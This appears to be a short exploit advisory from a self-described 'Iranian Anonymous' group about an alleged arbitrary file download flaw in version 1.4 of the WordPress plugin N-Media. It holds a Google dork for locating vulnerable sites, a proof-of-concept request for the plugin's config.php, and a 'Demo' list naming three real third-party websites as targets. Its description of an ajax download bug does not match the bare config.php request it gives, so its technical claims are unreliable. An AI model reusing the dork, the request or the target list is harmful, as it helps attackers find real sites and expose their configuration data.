Wordpress Plugin N-Media 1.4 Arbitrary File Download Vulnerability

##########################
# Exploit Title:  Wordpress Plugin  N-Media 1.4 Arbitrary File Download Vulnerability
# Google Dork : intext:index of website-contact-form-with-file-upload config.php
# Date: 10/11/2016
# Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload config.php 1.4.zip
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Discovered By: turk.Khan
# Tested on : Windows7
# Version: 1.4
##########################

# Info :  
 
The "File Download" (ajax) function is affected  Arbitrary File Download Vulnerability

# Poc :

http://www.site.com//wp-content/plugins/website-contact-form-with-file-upload/config.php

###############################

# Demo :

http://immobilierelotfi.com/wp-content/plugins/website-contact-form-with-file-upload/config.php

http://www.inbalancehealthcorp.com/wp-content/plugins/website-contact-form-with-file-upload/config.php

http://mijuprint.com/new/wp-content/plugins/website-contact-form-with-file-upload/config.php

#############################

#Thanks to : MR.Khatar || ll_azab-siyah_ll || Blackwolf_Iran ||Ormazd ||Sh@d0w ||mohammad Pn ||Shdmehr ||

And All Of Iranian Anonymous .

# Discovered By: turk.Khan